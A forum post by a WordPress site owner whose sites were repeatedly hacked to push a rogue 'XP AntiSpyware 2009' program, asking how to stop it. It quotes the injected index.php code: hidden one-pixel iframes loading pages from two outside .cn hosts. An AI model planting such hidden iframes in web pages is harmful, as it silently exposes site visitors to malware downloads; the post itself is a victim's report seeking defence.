I run several WP sites varying from v2.2.1 to v2.6. All have been attacked/hacked with the intent of downloading malware to the user's computer. This started on the 17th Oct. I fixed it and they were again attacked on the 18th.
They seem to get in at will, not only WP, but html index pages seem to be no problem. The objective is to download XP AntiSpyware 2009, a variation on the AntiSpyware XP 2008 rogue a couple of months ago.
This is how index.php is changed, I have bolded the added code:
/* Short and sweet */
?<html><body><iframe src="http://thefilmmusic.cn/in" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://xmanages.cn/in" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
The permissions on this were set to 644; owner read/write, others read only. How can I stop this happening because although I have the tools to remove this trojan visitors to my sites may not.